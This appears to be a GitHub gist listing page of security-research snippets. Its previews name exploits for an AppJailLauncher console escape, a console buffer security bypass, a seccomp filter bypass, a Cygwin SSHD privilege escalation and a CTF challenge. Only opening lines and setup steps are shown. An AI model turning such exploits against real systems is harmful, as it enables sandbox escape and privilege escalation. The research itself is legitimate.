
masthoon / _writeup.md
Created December 17, 2022 20:06
MaxDebugger
masthoon / bgrep.c
Created April 30, 2022 20:39
bgrep.c
// dirty stolen code
#include <unistd.h>
#include <sys/types.h>
#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <stdlib.h>
masthoon / appjaillauncher_exploit.cpp
Last active November 29, 2023 14:07
AppJailLauncher console escape
#define UNICODE
#define _UNICODE
#include <iostream>
#include <string>
#include <Windows.h>
#include <Psapi.h>
#include <fstream>
#pragma comment(lib, "ntdll.lib")
#pragma comment(lib, "Psapi")
masthoon / extract_fw_rfu.py
Created August 18, 2021 18:36
Extract and decompress parts of RFU firmware
import sys
import struct
import lzma
# PJL Universal Exit Language (UEL) sequence, ESC %-12345X; presumably the
# delimiter the RFU parser searches for between PJL commands — confirm against
# the parsing code in this file.
PJL_ESC = b'\x1b%-12345X'
def parse_pjl_command(fw):
assert(fw[0] == 0x20)
cmd, info = fw[1:256].split(b' ', 1)
name, value = info.split(b'=', 1)
masthoon / convuln.cpp
Last active November 29, 2023 14:19
Console Input Buffer security
/*
MiniPoc for console buffer security bypass
Instructions
- Compile with x64 Native Tools Command Prompt for VS 2019
* cl /Zi /std:c++latest minipoc.cpp
- Copy executable and apply Low Integrity directly to the file
* copy minipoc.exe minipoclow.exe
* icacls minipoclow.exe /setintegritylevel Low
(/Zi for pdb generation)
masthoon / MichaelStorage.py
Created November 29, 2020 20:23
MichaelStorage Exploit HITCON 2020
import time
from pwintools import *
# Interact with binary
def act_alloc(type, size):
proc.sendline('1')
proc.recvuntil(':')
proc.sendline(str(type))
proc.recvuntil(':')
proc.sendline(str(size))
masthoon / sparc_emu.py
Created May 25, 2020 19:42
Sun? On my Sat? unicorn sparc emulation
import sys
import lief # py2.7 v0.9.0
from unicorn import *
from unicorn.sparc_const import *
import capstone
'''
Sample output with mu.input = FLAG_EXPLOIT_CMD:
puts(Configuration Server: Running)
sleep()
masthoon / seccomp_bypass_x32_compat.c
Last active December 17, 2022 16:55
Demo of seccomp-BPF blacklist bypass on systemd - Ubuntu
/*
root@ubuntu:/# gcc seccomp_bypass_x32_compat.c -w -static -o test
root@ubuntu:/# cat /etc/systemd/system/test.service
[Unit]
Description=Test attack
[Service]
Type=oneshot
# Remove IO from the service
SystemCallFilter=~@basic-io
# Limit ABI to x64 only
masthoon / lsass.py
Created February 2, 2019 07:28
Add users / groups listing & privileges
import windows.rpc
from windows.rpc import ndr
import windows.generated_def as gdef
import ctypes
class PLSAPR_OBJECT_ATTRIBUTES(ndr.NdrStructure):
MEMBERS = [ndr.NdrLong,
ndr.NdrUniquePTR(ndr.NdrWString),
ndr.NdrUniquePTR(ndr.NdrLong), # We dont care of the subtype as we will pass None
masthoon / cygeop.cpp
Created January 21, 2019 07:54
Cygwin SSHD EoP
// CygEOP.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include <Windows.h>
#include <psapi.h>
#pragma comment(lib, "ntdll.lib")
#define STATUS_SUCCESS 0